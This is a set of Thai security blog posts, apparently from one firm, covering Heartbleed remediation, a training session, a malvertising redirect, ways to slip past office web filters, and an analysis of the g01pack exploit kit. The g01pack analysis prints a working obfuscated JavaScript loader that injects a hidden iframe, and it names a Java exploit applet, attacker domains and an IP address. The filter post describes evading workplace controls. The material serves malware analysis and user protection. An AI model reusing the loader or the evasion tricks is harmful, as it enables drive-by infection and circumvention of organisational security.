Take a deep breath with Heartbleed

สำหรับเรื่อง Heartbleed ผมขอเขียนให้กระชับที่สุดก็แล้วกันครับ (เพราะมีแหล่งข้อมูลเยอะแล้ว และอีกอย่างไอ้ Heartbleed ทำเอาเลือดสาดเลยทีเดียว)

heartbleed

Heartbleed bug หรือ CVE-2014-0160 ทำให้ใครก็ตามสามารถเห็นข้อมูลใน memory ครั้งละประมาณ 64K ได้ต่อ 1 ครั้ง อยากเห็นกี่ครั้งก็ได้ตามสบาย แล้วอะไรที่เห็นได้บ้างหรอครับ? เพียบเลยเช่น content ที่ไม่ต้อง authenticate ก่อนก็ดูได้, ข้อมูล session, Private Key, username และ passwords ส่วนใครอยากทราบรายละเอียดเพิ่มเติม ลองดูจากรายการด้านล่างได้เลยนะครับ

- ถ้าใครยังไม่รู้จักให้ลองอ่านจาก heartbleed.com

- หากใครไม่สันทัดภาษาอังกฤษ ThaiCERT ก็เขียนบทความออกมาอธิบายแล้วครับ ระวังภัย ช่องโหว่ใน OpenSSL ผู้ไม่หวังดีสามารถขโมยข้อมูลใน Memory จากเครื่องของเหยื่อได้ (Heartbleed, CVE-2014-0160)

- คุณ Phitchayaphong Tantikul ทำ VDO ภาษาไทยเอาไว้สามารถไปดูเพิ่มความเข้าใจได้ที่ ช่องโหว่ OpenSSL Heartbleed

เอาล่ะครับ เข้าเรื่องเลยดีกว่า

ปัญหาคือมันมีอะไรที่มากกว่านั้น

opensslhttps://www.openssl.org/news/secadv_20140407.txt

เพียงแค่ update เรื่องมันยังไม่จบนะครับ สาเหตุก็คือ

1. เราไม่รู้ว่าโดนเอาอะไรออกไปแล้วบ้าง ถ้าหากมีการ implement Extrusion Detection ก็ลองไปดูเลยนะครับว่ามีอะไรถูกเอาออกไปแล้วบ้างหรือไม่(ผมจัดว่าวิธีนี้ยากเกินไป อาจจะต้องรอ vendor ทำ flow analysis ออกมาโดยเฉพาะ ซึ่งช้าไปแล้ว)

2. สืบเนื่องจากข้อ 1 มันไม่มี log ปรากฎครับ หากเราดูแต่ web server log เราจะตอบคำถามใครไม่ได้ว่ามันเสียหากมากน้อยแค่ไหน เป็นสถานการณ์ที่เราเสียเปรียบเป็นอย่างยิ่ง

3. คุณ Update และแก้ปัญหาฝั่ง server-side ได้ก็จริง แล้วฝั่ง client-side ล่ะครับ ชิบหายครับ ลองคิดดูว่าถ้าเราบังคับให้ client connect กับ server ที่เรา control ได้ client-side attack ก็สามารถเกิดขึ้นได้ซึ่งจะทำให้เราสามารถอ่านข้อมูลใน memory ของ client ได้ ซึ่งตอนนี้นักวิจัยเค้าออกมา confirm แล้วครับว่า Android versions 4.1.0 และ 4.1.1a มีโอกาสโดน heartbleed bug เล่นงาน
(SSL บน Window ไม่เป็นไร ไม่งั้นตายหมู่แน่นอนครับ)

ดังนั้นเวลาตอบคำถามใครก็ตามอย่าลืมประเด็นเรื่องพวกนี้ด้วยนะครับ

heartbleed2

คำแนะนำเพิ่มเติมที่พวกเราอยากบอกทุกท่าน

1. ทดสอบดูว่า Server ทั้งที่อยู่ใน internal network และ DMZ zone มีช่องโหว่หรือไม่ มีจัดการแก้ bug
ก่อนเลยครับ รีบๆทำด้วย
2. Generate Certificate ใหม่เลยครับ อย่าคิดว่าเปลืองแรง ถ้าหากระบบของเราเป็นระบบสำคัญต้องทำทันที
3. เช่นเดียวกันกับข้อ 2 จัดการ reset password ของผู้ใช้งานทุกคน ไม่ใช่เรื่องน่าอายเพราะโดนกันทั้งโลกนะครับ
4. Application ที่เอาไป plug กับคนอื่นๆ ลองถามเค้าด้วยนะครับว่าระบบของเค้า OK กับ heartbleed หรือยัง ไม่ว่าจะเป็นการ implement โดยใช้ library ที่ใช้ openssl หรือเอา application ไปคุยกับ application อื่นๆ
5. สำหรับ Client-side จัดเป็นเรื่องใหญ่ครับ ผมหวังว่าอย่างน้อย browser vendor อาจจะทำอะไรได้บ้าง (ตอนนี้ก็มี plugin ช่วย check แต่เราไม่ค่อยชอบใช้พวก plugin ครับ)
6. Cloud Service ที่เราใช้กันอยู่มีใครโดนเล่นหรือไม่ ไปดูได้ที่ The Heartbleed Hit List: The Passwords You Need to Change Right Now
7. ช่วงนี้ระวัง Phishing ด้วยครับ ถ้ามี mail ส่งมาให้ reset password ขอให้มีสติ
8. สำหรับการตรวจดูว่า Web นั้นๆโดน heartbleed หรือไม่ สามารถตรวจได้หลายที่ เช่น

9. ผมว่าตรวจด้วย script เห็นชัดสุดครับ internal test ภายใน private network ก็สามารถทำได้ หากใครต้องการข้อมูลเพิ่มเติมว่าจะ check Heartbleed ของเครื่องในองค์กรได้อย่างไรสามารถสอบถามมาได้เลยนะครับ เดี๋ยวจะเอา script ไปให้ลองใช้ดู แต่ผมเชื่อว่าหลายๆคนทำได้อยู่แล้ว :)

Stay safe and get secured!!

Information Security Training for Bhutan’s MOIC officers

สัปดาห์ที่ผ่านมาพวกเรารู้สึกเป็นเกียรติและยินดีเป็นอย่างยิ่งที่ทางกระทรวงเทคโนโลยีสารสนเทศและการสื่อสาร (ICT) ได้ให้โอกาสกับพวกเราไปบรรยายให้กับเจ้าที่ด้าน ICT จาก Ministry of Information and Communication หรือ MOIC จากราชอาณาจักรภูฏานในหัวข้อดังต่อไปนี้

1. พื้นฐานเทคโนโลยี Remote Access
2. พื้นฐานเทคโนโลยี Web Filtering
3. Penetration testing/Ethical Hacking
4. Basic Network Security Monitoring
5. Malicious PDF Analysis
6. Wanna Learn Kung fu?

Bhutan1
หลังจากสิ้นสุดการบรรยายทางผู้เข้ารับการอบรมก็ได้ชื่นชมและให้คำขอบคุณกับความรู้, วิธีการและเทคนิคต่างๆที่จะนำไปประยุกต์ใช้ได้จริงในการทำงาน

พวกเราจะ Deliver ผลงานดีๆออกมาอย่างต่อเนื่องครับ และหวังว่าจะมีโอกาสเปิด class ให้กับคนไทยได้เรียนรู้เรื่อง Security อย่างจริงจังในรูปแบบที่เป็นแบบฉบับของเรา ซึ่งพวกเรามั่นใจว่าหลังจากเรียนจบจะต้องเอาไปต่อยอดได้ต่อไปอย่างแน่นอน

อยากเรียนกังฟูกันบ้างรึยังครับ!
bhutan pentest cover

IncognitoLab Case : Attack by advertisement

สถานการณ์ล่าสุด

2:20PM 26 Sep 2013 script หยุดการ redirect

สำหรับท่านที่มีปัญหาเรื่องการ redirect อัตโนมัติ ให้ลองตรวจสอบว่า Java ที่ติดตั้งอยู่ในเครื่องคือ version 1.7 ใช่หรือไม่ ซึ่งสามารถตรวจสอบได้ที่ BrowserScan by Rapid7 โดยที่การวิเคราะห์ล่าสุดนั้นพบว่าเครื่องที่เกิดปัญหาจะมีการใช้งาน java 1.7.x อยู่ และ website ที่เข้าไปใช้งานมี script การติดตามผู้ใช้งานอยู่ตามรูป
Screen Shot 2556-09-26 at 2.13.18 PM
ซึ่งตัวการที่ทำให้การใช้งานของเรามีปัญหาคือ scorecardresearch.com

วิธีการแก้ไข

ต้อง Block มันครับ บน chrome และ firefox มี plugin ชื่อ collusion ที่สามารถ block การติดตามการใช้งานได้ ซึ่งมันจะ block website พวก tracer ที่คอยติดตามการท่องเว็บของเราอยู่ตลอด


หลังจากที่ห่างหายไปนานเมื่อวานพวกเราพึ่งจะเผยแพร่บทความไป ตั้งใจว่าจะทิ้งช่วงไว้สักนิดค่อยเขียนบทความใหม่ แต่เราก็ทำไม่ได้ครับเนื่องจากมีเหตุการณ์บางอย่างเกิดขึ้นกับการใช้งาน Internet ของพวกเรา นั่นคือบาง Website ที่เราเข้าไปใช้งาน เกิดอาการแปลกๆขึ้น โดยหลังจากเข้าไปบาง website มันมักจะ redirect ไปที่ http://www.forex-prices.com

forex_redir1

หลังจากที่พวกเราสังเกตดูหลายๆ website* ได้แก่ bloomberg, posttoday และ stock2morrow ก็พบว่าภายใน website มีการใช้งาน service ของ scorecardresearch.com อยู่ ซึ่ง scorecardresearch.com นั้น claim ตัวเองว่าเป็น service ด้านการตลาดอย่างหนึ่ง

*ขออนุญาตกล่าวอ้างอิงถึงเพื่อเป็นประโยชน์กับผู้อ่านครับ จริงๆแล้วมีหลายเว็บแต่ขอยกเฉพาะ website ที่คนไทยน่าจะรู้จักกันมากพอสมควร นอกจากนี้เราพบว่าปัญหานี้เกิดขึ้นกับ ISP บางเจ้าเท่านั้นครับ

พอเราสังเกตให้ละเอียดขึ้นพบว่าหลังจากที่เข้า website ดังกล่าวจะมี request ไปที่ b.scorecardresearch.com เกิดขึ้นเสมอตามรูป
forex_redir2

หลังจากนั้นก็จะมี script ดังกล่าวขึ้นมาทำงาน
forex_redir3

ถ้าวิเคราะห์แบบเร็วๆดูก็จะพบว่ามี keyword เหล่านี้อยู่ใน sourcecode

self","top","href","location","http://goo.gl/voNi7T","script",
"createElement","type","text/javascript","async","src",
"http://fxpr.com//api.js","getElementsByTagName","authID","",
"body","p","div","h1","header","html","insertBefore","parentNode

ใน keyword ดังกล่าวมีการอ้างอิงถึง http://goo.gl/voNi7T ถ้าหากลองเรียกดูก็จะพบว่ามันคือ short URL ของ forex-prices.com

ถามว่าจะแก้ไขอย่างไร

คำตอบนี้จะต้องให้ webmaster ของ website ที่ใช้บริการ advertisement หรือ banner ต่างๆ มาช่วยจัดการครับ เนื่องจากวิธีนี้เป็นการโจมตีผ่านการใช้งาน ads และ banner กลุ่มผู้ร้าย (cyber criminal) อยากจะ enable หรือ disable การโจมตีเมื่อไรก็ได้ที่อยากจะทำ ทำให้เรา trace ไปหาตัวผู้ร้ายได้ยาก

ส่วนฝั่งผู้ใช้งานก็ต้องดูแลตัวเองด้วยการ update patch ทั้ง OS, Browser และ Plugin ต่างๆ ลองไปตรวจสอบว่า Browser ที่ใช้งานปลอดภัยหรือไม่ ผ่าน service ชื่อ BrowserScan ของ rapid7 ดูนะครับ (ฟรีและดีมาก)

ถ้าหากใครเข้า website แล้วเกิดอาการแบบนี้ก็ต้องระมัดระวังตัวกันด้วยนะครับ ครั้งนี้พวก cyber criminal ทำแค่ redirect เราไปสักที่หนึ่งเพื่อจุดประสงค์อะไรก็แล้วแต่ คราวหน้ามันอาจจะ redirect เราไป landing page เพื่อโจมตีเราก็เป็นได้

นอกจากนี้ผู้ใช้งานทั่วๆไปอย่างเราๆ อาจจะสามารถป้องกันด้วยวิธีการติดตั้ง Add-on ของ Web Browser ที่ช่วย Block Ads ต่างๆ ได้ แต่ผมคิดว่า Solution นี้เป็นแค่วิธีการป้องกันชั่วคราวเท่านั้น เพราะวิธีการโจมตีแบบนี้ถือว่า Stealth มากๆ การ Update ของ Add-on อาจจะมาไม่ทันทำให้เราอาจตกเป็นเหยื่อได้อีก อย่างไรก็ตามวิธีการป้องกันที่ดีที่สุดก็คือการสร้าง Security Awareness ให้กับตัวเราเองครับ

Be Prepared!!!

เรื่องบล็อคเว็บไซด์น่ะหรือ คุณหยุดผมไม่ได้หรอก (ฉบับง่าย)

คุณเคยรู้สึกแบบนี้บ้างไหม?

อยู่ออฟฟิศ เข้า Web ไม่ได้อีกแล้ว จะบล็อคอะไรกันนักหนา Web ที่จะเข้าก็ใช้เกี่ยวกับงานทั้งนั้นแหละ ขอเข้าแค่ Web เดียว นี่จะต้องไป Process กันนานขนาดนี้เลยเหรอ เออเดี๋ยวเปิดดูผ่านจอเล็ก ๆ ในมือถือก็ได้

วันนี้เรามีวิธีการที่จะมาช่วยคุณได้ เตรียมพบกับวิธีจัดการกับเจ้า Web Filter หรือเจ้าอุปกรณ์ที่ใช้ควบคุมการเข้า Website ในองค์กรกันนะครับ

เริ่มจากทำความเข้าใจก้บ Web Filter ก่อนว่าทำงานอย่างไร

ในบางครั้ง Web Filter ก็ถูกเรียกว่า Web Proxy ซึ่งในองค์กรมักจะวางเจ้าอุปกรณ์ตัวนี้ในลักษณะที่เป็น Proxy Server

จากรูปด้านบนจะเห็นว่า Proxy Server เป็นตัวกลางที่ใช้รับส่งข้อมูลระหว่าง Alice และ Bob เปรียบเสมือน Proxy Server เป็นตัวกลางระหว่าง User ในองค์กร และ Website ต่าง ๆ ดังนั้น Request จาก User จะถูกส่งมาที่ Proxy ก่อนที่จะส่งจาก Proxy ไปหา Website ทำให้ Proxy นั้นสามารถตัดสินใจได้ว่าจะอนุญาตให้ User เข้าใช้งาน Website ต่าง ๆ ได้หรือไม่ ซึ่งความเก่งในการตัดสินใจนี้ขึ้นอยู่กับอุปกรณ์ว่าฉลาดแค่ไหนด้วยครับ

Web Filter

เพิ่มเติม Function ของ Web Proxy นั้นนอกจากจะทำ Web Filter แล้วมักจะใช้คู่กับการทำ Caching ด้วย เพื่อเพิ่มความเร็วและช่วยประหยัด Bandwidth ให้กับองค์กรในกรณีที่มีหลาย ๆ User ต้องการเข้าใช้งาน Web Site เดียวกัน ก็สามารถดึงข้อมูลจากใน Cache ส่งให้ได้ทันที ไม่ต้องเสียเวลาไป Request จาก Server หลาย ๆ ครั้ง

สำหรับการ  Bypass Web Filter หรือการแอบเล่น Internet นั้นสามารถทำได้หลายวิธี แต่บทความนี้จะยกตัวอย่างมา 3 วิธี ดังต่อไปนี้

วิธีที่ 1 ใช้ HTTPS แทน HTTP

การวาง Web Proxy นั้นหากไม่ได้มีการเปิด Feature ที่เรียกว่า SSL Interception ไว้ Admin ของระบบมักจะมีการปล่อยให้ทุก Request ที่เป็น HTTPS วิ่งออกสู่ Internet ได้เลย

SSL Interception คือ วิธีการ Decrypt ข้อมูลของ SSL Tunnel เพื่อวิเคราะห์ดูถึง Content หรือ URL ใน Request ซึ่งหากไม่ทำการ Decrypt ข้อมูลก่อน Web Proxy ก็จะไม่สามารถตัดสินใจได้ว่าควรอนุญาตให้ Request นั้นผ่านไปหรือไม่ ซึ่งจะกลายเป็นว่าจะปล่อยผ่านทุก ๆ Request ที่เป็น HTTPS (เข้าได้ทุก HTTPS website) หรือ ไม่ปล่อย HTTPS เลย (Website ที่เป็น HTTPS จะเข้าไม่ได้เลย)

หากองค์กรไหนที่ต้องการจะทำ SSL Interception นั้นจะต้องมีความเข้าใจในเรื่อง Digital Certificate พอสมควร ไม่อย่างนั้น User จะพบกับปัญหาการแจ้งเตือน “SSL Certificate Untrusted” ได้ เนื่องจากว่าการทำ SSL Interception เปรียบเสมือนกับการทำ Man-in-the-middle attack รูปแบบนึง

วิธีที่ 2 ใช้ Google Cache

ถ้าเคยสังเกตจะเห็นว่าส่วนใหญ่ใน Search Result ของ Google มักจะมีให้กด Cached ดูได้ ซึ่ง Cache ก็คือข้อมูลเก่าที่มีการเก็บไว้ที่ Google ตอนที่ Google ทำการ Crawling Web Site นั้น ๆ นั่นเอง

incognitolab search

การใช้งาน Cached นั้นจะช่วยให้สามารถอ่านข้อมูลบนหน้า Web Site ได้เนื่องจากว่า Request ที่มีการส่งไปนั้นจะเป็นการส่งไปหา Google ซึ่งปกติแล้วไม่มีใครเค้า Block Google Website กันครับ แต่ว่าจะมีข้อเสียคือ ข้อมูลใน Cache ของ Google นั้นอาจจะเป็นข้อมูลที่ไม่ใช่ข้อมูล update ล่าสุด และการใช้งานนั้นมักจะเป็นการเข้าใช้งานได้ทีละหน้าเท่านั้น เนื่องจาก Link ต่าง ๆ จาก Cache จะ Link ไปหา Website จริง ซึ่งอาจจะถูก Block อยู่

วิธีที่ 3 ใช้ Google Translate

สำหรับวิธีนี้โดยส่วนตัวชอบมากครับ เราสามารถใช้ Google Translate เพื่อ Bypass Web Filter ได้โดยการใช้การแปลภาษา ซึ่งปกติเรามักจะใช้ Google Translate แค่แปลประโยคเท่านั้น แต่หากเราต้องการแปลทั้ง Website เราสามารถพิมพ์ชื่อ Website นั้น ๆ ที่กล่องด้านซ้ายมือได้เลย

google translate

หากอยากดู Website ที่ต้องการโดยภาษาไม่เปลี่ยน (หรือเปลี่ยนน้อยที่สุด) นั้น จะต้องเลือกต้องเลือกภาษา (output language) ที่ต้องการแปลให้ตรงกับ Website นั้น ๆ เช่น เลือกภาษาไทย สำหรับ Website Pantip.com ครับ จากนั้นก็ Click ไปที่ URL ในกล่องด้านขวามือได้เลย

google translate 2

จากรูปด้านบนจะเห็นว่าถึงแม้ Content ของ Website จะเป็นของ Website Pantip.com แต่ URL ที่ทำการ Request ไปนั้นเป็นของ Google ซึ่งปกติจะไม่ถูก Block อยู่แล้วครับ

สรุป

ทั้ง 3 วิธีนี้เป็นเพียงวิธีการง่าย ๆ เพื่อให้ User ทั่วไปเข้าใจและสามารถนำไปใช้ได้อย่างง่าย ๆ เท่านั้นครับ ซึ่ง 3 วิธีการนี้อาจจะใช้ผ่านบ้าง ไม่ผ่านบ้าง ก็ลองนำไปใช้ดู หากมีใครมีวิธีง่าย ๆ น่าสนใจก็แนะนำกันได้ครับ และหากมีใครสนใจเรื่อง Security เรื่องไหนเป็นพิเศษก็แจ้งเราได้เช่นกันนะครับ แล้วพบกันใหม่ครับ

Banking Trojan Hunting — g01pack’s fundamental analysis

1-2 วันที่ผ่านมาผมคิดว่าหลายๆคนที่เข้าไปดูข่าวออนไลน์บ่อยๆอาจจะตกใจเนื่องจาก Google และ Google Chrome มีการแจ้งเตือนภัยคุกคามว่า website ดังกล่าวอาจเป็นอันตรายต่อคอมพิวเตอร์ของผู้ใช้งาน

จากภาพด้านล่าง ผมพบหน้าจอจาก Homepage ของนสพ.ฉบับหนึ่งในวันที่ 12 มิถุนายน 2556
newspaper1

ในวันถัดมาวันที่ 13 มิถุนายน 2556 พบว่า website แห่งเดิมไม่พบปัญหา แต่พบปัญหากับ Homepage ของนสพ.อีกฉบับและสำนักข่าวอีกแห่งหนึ่งแทน
newspaper2

เราจึงค้นหาคำตอบด้วยการใช้ Service ที่ทำการตรวสอบ web-based malware ที่ชื่อ urlquery.net ซึ่งเป็น Service ที่ให้บริการฟรีครับ(กรณีทำ Bulk query แบบปริมาณมากๆอาจจะช้านิดหน่อย คิดว่าอีกไม่นานจะมี API ออกมาให้เรียกใช้งานได้ง่ายขึ้นครับ ไม่ต้องไปเขียน script เพื่อไปทำ Bulk query เอง) ผลของ urlquery ทำให้เราตกใจเป็นอย่างยิ่งเนื่องจากพบ Exploitation Kit* ที่ชื่อ g01pack
newspaper2_query

* Note:
1. ทำความเข้าใจกับ Exploitation kit ได้ที่บทความ Malware Fighting Technique — DNS Sinkhole
2. พวก Cyber crime (ซึ่งทุกวันนี้มันกลายเป็นขบวนการใหญ่ของโลก–Organised Cyber Crime–ไปแล้ว แก๊งค์พวกนี้มีการเคลื่อนไหวอยู่ในประเทศไทยด้วย–ที่เราเห็นตามข่าวบ่อยๆเรื่องการโจมตี Internet Banking ของธนาคารต่างๆนั่นแหละครับ) มี Crime-as-a-Service ที่บริการการก่ออาชญากรรมทุกรูปแบบ ข้อมูลเพิ่มเติมสามารถดูได้จาก Cybercriminals Today Mirror Legitimate Business Processes ของ Fortinet

เราเองใช้เวลาตามหา Active Exploitation Kit ที่วางโจมตีใน website ภายในประเทศสักพักแล้วครับ แต่ทุกๆครั้งที่หาเจอ Page ที่เป็น Exploit kit ก็หายไปบ้าง, invalid domain name บ้าง เราเจ็บใจพอสมควรเนื่องจากแก๊งค์พวกนี้ขโมยเงินในประเทศของเราออกไปเยอะทีเดียว แต่วันนี้พวกเค้าทำการ Plant exploitation kit บน page หนังสือพิมพ์ครับและพร้อมๆกับมีข่าวเรื่อง Banking Trojan ที่โจมตีอีกระลอก(ลองไปดูที่ http://pantip.com/topic/30599799 และการแจ้งเตือนบนหน้า Internet Banking ของแต่ละธนาคาร)

ครั้งนี้เราได้พบกับ Exploitation Code ที่ Active ตัวจริงแล้วครับ เรามาวิเคราะห์ g01pack แบบง่ายๆกันดีกว่า

Analysis

เริ่มแรกเลยก็ให้สังเกตว่ามีการแทรก javascript ประหลาดๆในหน้า Homepage ของนสพ.แห่งนั้น
newspaper2_query2

ให้เรานำตัวเลขดังกล่าวมาประกอบกัน จากนั้นก็ Decode ด้วย function ของมันเอง ใครงงลองไปดู Decoder ที่เราดัดแปลงจาก Script ดังกล่าวได้ที่ http://pastebin.com/KWPfz3mF ถ้าหากเราพยายามอ่าน Soucecode ของมัน(ที่ชื่อประหลาดๆ ดูเละๆนั่นแหละครับ**)จะพบว่ามันพยายามทำการสร้าง iframe ขนาด 1×1 แบบ hidden และ src ของมันถูก encode เอาไว้ซึ่งเปลี่ยนแปลงได้ตลอด(สาเหตุที่ตามหายาก) หลังจาก Decode ก็จะพบว่ามันมีการเรียกไปที่
dec1

Note:
** code ที่ดูประหลาดๆแบบนี้จงใจทำขึ้นเพื่อหลีกเลี่ยงการตรวจจับ และป้องกันไม่ให้ใครไปทำความเข้าใจการทำงานของมันง่ายๆครับ กระบวนการแบบนี้ทางเทคนิคเรียกว่า code ถูก obfuscated

Response จะเป็น obfuscated javascript ที่เป็น Landing Page อีกต่อหนึ่ง
(function(){var fYN=document,K={'i':'rame'},NNC,E;function GG(L,Y){return L.src=Y;}function D(m){m+='58,41,43,51,-10,56,48,56,7,41,44,62,45,58,60,5,-3,-3';m=m.split(',');t='';for(i=0;i<m.length-1;i++){n=parseInt(m[0]);n+=parseInt(m[i+1]);t+=String.fromCharCode(n);}return t;}if(/(Windows)/.test(navigator.userAgent)&&/(MSIE)/.test(navigator.userAgent)){try{NNC='56,48,60,60,56,2,-9,-9,43,66,64,43,64,66,-10,60,55,56,49,43,41,52,59,';E=md();TT=D(NNC);GG(E,TT);}catch(e){};}function l(){return 'if'+K.i;}function md(){var tt=document.createElement(l());tt.width='1px';NNC+='49,53,61,52,41,60,49,55,54,59,-10,54,45,60,-9,43,56,41,54,45,52,39,46,49,52,45,-9,43,';tt.height='1px';tt.style['visibility']='hidden';try{fYN['body']['appendChild'](tt);}catch(P){try{document.write('');document.body.appendChild(tt);}catch(uWin){}}return tt;}})();

ถ้าทำการ decode จะพบว่ามันมีการเรียกไปที่
dec2

ซึ่งจะพบหน้าจอตามรูปด้านล่าง
dec3
ข้อความที่ปรากฎเป็นบทที่คัดมาจากเรื่อง Hamlet ของ William Shakespeare แต่มีข้อความแปลกๆด้านบนแทรกเข้ามา และมีบางบรรทัดของที่หายไป(ตอนนี้เรายังไม่เข้าใจว่ามันหมายถึงอะไรเช่นกัน)

นอกเหนือจากนั้นยังพบว่ามีการแทรก applet แถมมาให้อีกด้วย ลองดู applet นั้นได้ที่ http://pastebin.com/q52Pi7Kx
หากลองดูให้ดี จะเห็น pattern ซ้ำๆจริงมั้ยครับ??

หลังจากที่ applet ทำงานมันจะพยายาม break security policy ดูที่ sourcecode
applet_code2
โดยอาศัยช่องโหว่ CVE-2012-1723 ที่ทำการโจมตี Java

อีกทั้งยังทำงานเป็นตัว Loader ที่พยายามทำการ download payload ต่างๆ เช่น banking trojan หรือ malware ประเภทอื่นๆมา deploy เพิ่มเติม
dec5

เราทำการทดสอบ applet ตัวนี้กับ virustotal และพบว่า Evasion ของมันไม่ธรรมดาครับ ผลของมันคือ Detection ratio: 3/47 ซึ่งถือว่าหลบหลีกได้ดีมาก

การแพร่ Exploitation Kit ผ่าน website ข่าวที่มีคนเข้าไปดูเป็นจำนวนมาก เป็นสิ่งที่น่าเป็นห่วงอย่างยิ่ง เราลองสังเกตพบว่าส่วนใหญ่มาจาก ads ที่อยู่ตาม website ต่างๆมันคอยซ่อนตัว รอโอกาสโจมตี พอเราจะเข้าไปตรวจสอบมันก็หายไป อีกทั้งยังมีการปิด-เปิด-เปลี่ยน domain name บ่อยมาก

สำหรับผู้ใช้งานทั่วไป

0.อ่านบทความของ Thaicert
1. สำหรับการใช้งานทั่วไป ส่วนใหญ่ java plugin ไม่จำเป็นต้องใช้งานอยู่แล้ว แนะนำว่าปิดการทำงานของ java ไปเลยดีกว่าครับ เพราะช่วงนี้เสี่ยง
2. ลองดูว่าเครื่องของเรามี patch อะไรที่ต้อง update บ้าง โดยสามารถใช้บริการจากที่นี่ได้เลยครับ Rapid7 Browser Scan ฟรี

สำหรับผู้ดูแลระบบและผู้สนใจ

0.อ่านบทความของ Thaicert
1. ลอง review logs โดยด่วนว่ามี users คนไหนที่ไป visit website ดังกล่าวบ้าง ซึ่งให้ดูจาก Firewall logs ก็พอครับ เพราะ resolve ไปที่

IP: 195.3.147.229 ใน Latvia
czxcxz.topicalsimulations.net
zxcasdw.gamesdropboxs.biz
zzzaaa.megabytessimilarity.net

ทั้ง 3 domain name ถูก registered วันที่ 10,11 และ 12 มิถุนายนที่ผ่านมาสดๆร้อนๆเลย
2. ใช้ Window Sysinternals กับเครื่องที่สงสัยว่าจะถูกโจมตี โดยให้เปิด Browser ขึ้นมาก่อน อีกวิธีคือให้ดู Hook ของ Process ของ Browser ด้วย ถ้าพบว่า function ที่สำคัญถูก Hook เช่นนี้เครื่องนั้นถูกโจมตีแน่นอน
hook
3. อ่านบทความเรื่อง Multi-Stage Exploit Attacks for More Effective Malware Delivery ของ Trusteer

ขอให้ทุกคนปลอดภัย Stay safe!!